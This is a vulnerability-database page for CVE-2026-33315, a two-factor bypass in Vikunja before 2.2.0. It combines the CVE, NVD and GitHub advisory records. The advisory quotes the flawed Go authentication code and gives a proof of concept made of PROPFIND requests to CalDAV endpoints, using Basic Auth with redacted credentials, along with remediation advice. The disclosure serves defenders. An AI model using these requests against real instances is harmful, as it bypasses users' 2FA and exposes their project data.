CVE-2026-33315 (GCVE-0-2026-33315)
Vulnerability from cvelistv5 – Published: 2026-03-24 14:53 – Updated: 2026-03-24 15:33
VLAI?
Title
Vikunja has a 2FA Bypass via Caldav Basic Auth
Summary
Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue.
Severity ?
CWE
- CWE-288 - Authentication Bypass Using an Alternate Path or Channel
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| go-vikunja | vikunja |
Affected:
< 2.2.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33315",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-24T15:33:15.387604Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T15:33:55.744Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "vikunja",
"vendor": "go-vikunja",
"versions": [
{
"status": "affected",
"version": "\u003c 2.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-288",
"description": "CWE-288: Authentication Bypass Using an Alternate Path or Channel",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T15:02:44.104Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq"
},
{
"name": "https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615"
},
{
"name": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released",
"tags": [
"x_refsource_MISC"
],
"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
}
],
"source": {
"advisory": "GHSA-47cr-f226-r4pq",
"discovery": "UNKNOWN"
},
"title": "Vikunja has a 2FA Bypass via Caldav Basic Auth"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33315",
"datePublished": "2026-03-24T14:53:34.375Z",
"dateReserved": "2026-03-18T21:23:36.676Z",
"dateUpdated": "2026-03-24T15:33:55.744Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33315\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-24T15:16:35.227\",\"lastModified\":\"2026-03-24T19:21:46.057\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-288\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.2.0\",\"matchCriteriaId\":\"F28D4CDA-D35C-4636-AABA-A22EBE6F64D0\"}]}]}],\"references\":[{\"url\":\"https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33315\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T15:33:15.387604Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T15:33:45.879Z\"}}], \"cna\": {\"title\": \"Vikunja has a 2FA Bypass via Caldav Basic Auth\", \"source\": {\"advisory\": \"GHSA-47cr-f226-r4pq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"go-vikunja\", \"product\": \"vikunja\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq\", \"name\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615\", \"name\": \"https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"name\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-288\", \"description\": \"CWE-288: Authentication Bypass Using an Alternate Path or Channel\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-24T15:02:44.104Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33315\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T15:33:55.744Z\", \"dateReserved\": \"2026-03-18T21:23:36.676Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-24T14:53:34.375Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-33315
Vulnerability from fkie_nvd - Published: 2026-03-24 15:16 - Updated: 2026-03-24 19:21
Severity ?
Summary
Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F28D4CDA-D35C-4636-AABA-A22EBE6F64D0",
"versionEndExcluding": "2.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, the Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc. Version 2.2.0 patches the issue."
},
{
"lang": "es",
"value": "Vikunja es una plataforma de gesti\u00f3n de tareas de c\u00f3digo abierto autoalojada. Antes de la versi\u00f3n 2.2.0, el endpoint Caldav permite el inicio de sesi\u00f3n usando Autenticaci\u00f3n B\u00e1sica, lo que a su vez permite a los usuarios eludir el TOTP en cuentas con 2FA habilitado. El usuario puede entonces acceder a informaci\u00f3n est\u00e1ndar del proyecto que normalmente estar\u00eda protegida detr\u00e1s de 2FA (si est\u00e1 habilitado), como el nombre del proyecto, la descripci\u00f3n, etc. La versi\u00f3n 2.2.0 corrige el problema."
}
],
"id": "CVE-2026-33315",
"lastModified": "2026-03-24T19:21:46.057",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-24T15:16:35.227",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-288"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-47CR-F226-R4PQ
Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-03-25 20:53
VLAI?
Summary
Vikunja has a 2FA Bypass via Caldav Basic Auth
Details
Summary
The Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc.
Details
The two files below show that when a user is accessing Caldav via Basic Authentication, it skips all steps involving 2FA. The order of operations is essentially: 1. Retrieve basic credentials. 2. Verify username. 3. Verify password. 4. Success
pkg/routes/caldav/auth.go:45
u, err := checkUserCaldavTokens(s, credentials)
if user.IsErrUserDoesNotExist(err) {
return false, nil
}
if u == nil {
u, err = user.CheckUserCredentials(s, credentials)
if err != nil {
log.Errorf("Error during basic auth for caldav: %v", err)
return false, nil
}
}
pkg/user/user.go:358
func CheckUserCredentials(s *xorm.Session, u *Login) (*User, error) {
// Check if we have any credentials
if u.Password == "" || u.Username == "" {
return nil, ErrNoUsernamePassword{}
}
// Check if the user exists
user, err := getUserByUsernameOrEmail(s, u.Username)
if err != nil {
// hashing the password takes a long time, so we hash something to not make it clear if the username was wrong
_, _ = bcrypt.GenerateFromPassword([]byte(u.Username), 14)
return nil, ErrWrongUsernameOrPassword{}
}
if user.Issuer != IssuerLocal {
return user, &ErrAccountIsNotLocal{UserID: user.ID}
}
// The user is invalid if they need to verify their email address
if user.Status == StatusEmailConfirmationRequired {
return &User{}, ErrEmailNotConfirmed{UserID: user.ID}
}
// Check the users password
err = CheckUserPassword(user, u.Password)
if err != nil {
if IsErrWrongUsernameOrPassword(err) {
handleFailedPassword(user)
}
return user, err
}
return user, nil
}
PoC
-
Setup a Docker instance of Vikunja
v2.1.0and create an account. Enable 2FA on the account. -
Logout of the account.
- Using a web proxy, such as Burp Suite, craft an HTTP request to the endpoint similar to the one shown below. Ensure that the 2FA-enabled user's username and password is properly Base64-encoded and inserted into the
Authorizationheader.
PROPFIND /dav/principals/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic {{ REDACTED }}
[ TRUNCATED ]
<?xml version="1.0"?><d:propfind xmlns:d="DAV:"><d:prop><d:displayname/><d:resourcetype/></d:prop></d:propfind>
- Observe that the response contains authenticated user information.
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 16 Mar 2026 19:31:47 GMT
Content-Length: 398
<?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:" xmlns:C="urn:ietf:params:xml:ns:caldav" xmlns:CS="http://calendarserver.org/ns/"><D:response><D:href>/dav/projects</D:href><D:propstat><D:prop><D:displayname>projects</D:displayname>
[ TRUNCATED ]
- Other requests can then be crafted to retrieve more information about a specific project, such as the one below.
PROPFIND /dav/projects/1/{{ PROJECT NAME }}/ HTTP/1.1
Host: 127.0.0.1:3456
Authorization: Basic [ REDACTED ]
[TRUNCATED]
<?xml version="1.0"?><c:calendar-query xmlns:d="DAV:" xmlns:c="urn:ietf:params:xml:ns:caldav"><d:prop><d:getetag/><c:calendar-data/></d:prop><c:filter><c:comp-filter name="VCALENDAR"><c:comp-filter name="VTODO"/></c:comp-filter></c:filter></c:calendar-query>
HTTP/1.1 207 Multi-Status
Content-Type: text/xml; charset=utf-8
[ TRUNCATED ]
[ TRUNCATED ]
<D:prop><C:calendar-data>BEGIN:VCALENDAR
VERSION:2.0
X-PUBLISHED-TTL:PT4H
X-WR-CALNAME:Inbox
PRODID:-//Vikunja Todo App//EN
BEGIN:VTODO
UID:8gb6eclz-dad5-4a38-80a8-09005707eb51
DTSTAMP:20260316T190905Z
SUMMARY:test
DESCRIPTION:<p>description</p>
CREATED:20260301T203712Z
LAST-MODIFIED:20260316T190905Z
BEGIN:VALARM
TRIGGER;VALUE=DATE-TIME:20260316T130000Z
ACTION:DISPLAY
DESCRIPTION:test
END:VALARM
END:VTODO
END:VCALENDAR</C:calendar-data></D:prop><D:status>HTTP/1.1 200 OK
[ TRUNCATED ]
Impact
Any user that has 2FA enabled could have it bypassed, allowing attacker access to a lot of the user's project information.
Remediation
If there are 2FA barriers to access an account in a specific fashion, all integrations should follow those if they're using the same methods of authentication. The easiest path is probably to disable Basic Authentication for Caldav by default, but keep the token access enabled, that way users can generate tokens specifically for Caldav if they want to use that feature. Basic Auth for it could be kept, but would most likely want to be a feature flag or something along those lines. That's so users can turn it on if it's necessary, but can be notified in the documentation that it's a more unsafe pattern if 2FA is enabled.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33315"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T17:25:35Z",
"nvd_published_at": "2026-03-24T15:16:35Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe Caldav endpoint allows login using Basic Authentication, which in turn allows users to bypass the TOTP on 2FA-enabled accounts. The user can then access standard project information that would normally be protected behind 2FA (if enabled), such as project name, description, etc.\n\n### Details\nThe two files below show that when a user is accessing Caldav via Basic Authentication, it skips all steps involving 2FA. The order of operations is essentially:\n1. Retrieve basic credentials.\n2. Verify username.\n3. Verify password.\n4. Success\n\n**pkg/routes/caldav/auth.go:45**\n```go\nu, err := checkUserCaldavTokens(s, credentials)\n\tif user.IsErrUserDoesNotExist(err) {\n\t\treturn false, nil\n\t}\n\tif u == nil {\n\t\tu, err = user.CheckUserCredentials(s, credentials)\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"Error during basic auth for caldav: %v\", err)\n\t\t\treturn false, nil\n\t\t}\n\t}\n```\n\n**pkg/user/user.go:358**\n```go\nfunc CheckUserCredentials(s *xorm.Session, u *Login) (*User, error) {\n\t// Check if we have any credentials\n\tif u.Password == \"\" || u.Username == \"\" {\n\t\treturn nil, ErrNoUsernamePassword{}\n\t}\n\n\t// Check if the user exists\n\tuser, err := getUserByUsernameOrEmail(s, u.Username)\n\tif err != nil {\n\t\t// hashing the password takes a long time, so we hash something to not make it clear if the username was wrong\n\t\t_, _ = bcrypt.GenerateFromPassword([]byte(u.Username), 14)\n\t\treturn nil, ErrWrongUsernameOrPassword{}\n\t}\n\n\tif user.Issuer != IssuerLocal {\n\t\treturn user, \u0026ErrAccountIsNotLocal{UserID: user.ID}\n\t}\n\n\t// The user is invalid if they need to verify their email address\n\tif user.Status == StatusEmailConfirmationRequired {\n\t\treturn \u0026User{}, ErrEmailNotConfirmed{UserID: user.ID}\n\t}\n\n\t// Check the users password\n\terr = CheckUserPassword(user, u.Password)\n\tif err != nil {\n\t\tif IsErrWrongUsernameOrPassword(err) {\n\t\t\thandleFailedPassword(user)\n\t\t}\n\t\treturn user, err\n\t}\n\n\treturn user, nil\n}\n```\n\n### PoC\n1. Setup a Docker instance of Vikunja `v2.1.0` and create an account. Enable 2FA on the account.\n\u003cimg width=\"1506\" height=\"646\" alt=\"CleanShot 2026-03-16 at 15 30 24@2x\" src=\"https://github.com/user-attachments/assets/e88522af-4333-4758-8ba4-3e34de9680f7\" /\u003e\n\n2. Logout of the account.\n3. Using a web proxy, such as Burp Suite, craft an HTTP request to the endpoint similar to the one shown below. Ensure that the 2FA-enabled user\u0027s username and password is properly Base64-encoded and inserted into the `Authorization` header.\n\n```http\nPROPFIND /dav/principals/ HTTP/1.1\nHost: 127.0.0.1:3456\nAuthorization: Basic {{ REDACTED }}\n[ TRUNCATED ]\n\n\u003c?xml version=\"1.0\"?\u003e\u003cd:propfind xmlns:d=\"DAV:\"\u003e\u003cd:prop\u003e\u003cd:displayname/\u003e\u003cd:resourcetype/\u003e\u003c/d:prop\u003e\u003c/d:propfind\u003e\n```\n5. Observe that the response contains authenticated user information.\n```http\nHTTP/1.1 207 Multi-Status\nContent-Type: text/xml; charset=utf-8\nVary: Accept-Encoding\nDate: Mon, 16 Mar 2026 19:31:47 GMT\nContent-Length: 398\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003cD:multistatus xmlns:D=\"DAV:\" xmlns:C=\"urn:ietf:params:xml:ns:caldav\" xmlns:CS=\"http://calendarserver.org/ns/\"\u003e\u003cD:response\u003e\u003cD:href\u003e/dav/projects\u003c/D:href\u003e\u003cD:propstat\u003e\u003cD:prop\u003e\u003cD:displayname\u003eprojects\u003c/D:displayname\u003e\n[ TRUNCATED ]\n```\n6. Other requests can then be crafted to retrieve more information about a specific project, such as the one below.\n```http\nPROPFIND /dav/projects/1/{{ PROJECT NAME }}/ HTTP/1.1\nHost: 127.0.0.1:3456\nAuthorization: Basic [ REDACTED ]\n[TRUNCATED]\n\n\u003c?xml version=\"1.0\"?\u003e\u003cc:calendar-query xmlns:d=\"DAV:\" xmlns:c=\"urn:ietf:params:xml:ns:caldav\"\u003e\u003cd:prop\u003e\u003cd:getetag/\u003e\u003cc:calendar-data/\u003e\u003c/d:prop\u003e\u003cc:filter\u003e\u003cc:comp-filter name=\"VCALENDAR\"\u003e\u003cc:comp-filter name=\"VTODO\"/\u003e\u003c/c:comp-filter\u003e\u003c/c:filter\u003e\u003c/c:calendar-query\u003e\n```\n\n```http\nHTTP/1.1 207 Multi-Status\nContent-Type: text/xml; charset=utf-8\n[ TRUNCATED ]\n\n[ TRUNCATED ]\n\u003cD:prop\u003e\u003cC:calendar-data\u003eBEGIN:VCALENDAR\u0026#xA;VERSION:2.0\u0026#xA;X-PUBLISHED-TTL:PT4H\u0026#xA;X-WR-CALNAME:Inbox\u0026#xA;PRODID:-//Vikunja Todo App//EN\u0026#xA;BEGIN:VTODO\u0026#xA;UID:8gb6eclz-dad5-4a38-80a8-09005707eb51\u0026#xA;DTSTAMP:20260316T190905Z\u0026#xA;SUMMARY:test\u0026#xA;DESCRIPTION:\u0026lt;p\u0026gt;description\u0026lt;/p\u0026gt;\u0026#xA;CREATED:20260301T203712Z\u0026#xA;LAST-MODIFIED:20260316T190905Z\u0026#xA;BEGIN:VALARM\u0026#xA;TRIGGER;VALUE=DATE-TIME:20260316T130000Z\u0026#xA;ACTION:DISPLAY\u0026#xA;DESCRIPTION:test\u0026#xA;END:VALARM\u0026#xA;END:VTODO\u0026#xA;END:VCALENDAR\u003c/C:calendar-data\u003e\u003c/D:prop\u003e\u003cD:status\u003eHTTP/1.1 200 OK\n[ TRUNCATED ]\n```\n\n### Impact\nAny user that has 2FA enabled could have it bypassed, allowing attacker access to a lot of the user\u0027s project information. \n\n### Remediation\nIf there are 2FA barriers to access an account in a specific fashion, all integrations should follow those if they\u0027re using the same methods of authentication. The easiest path is probably to disable Basic Authentication for Caldav by default, but keep the token access enabled, that way users can generate tokens specifically for Caldav if they want to use that feature. Basic Auth for it could be kept, but would most likely want to be a feature flag or something along those lines. That\u0027s so users can turn it on if it\u0027s necessary, but can be notified in the documentation that it\u0027s a more unsafe pattern if 2FA is enabled.",
"id": "GHSA-47cr-f226-r4pq",
"modified": "2026-03-25T20:53:21Z",
"published": "2026-03-20T17:25:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-47cr-f226-r4pq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33315"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/commit/cdf5d30a425d032f749b78b98b828f25ad882615"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Vikunja has a 2FA Bypass via Caldav Basic Auth"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…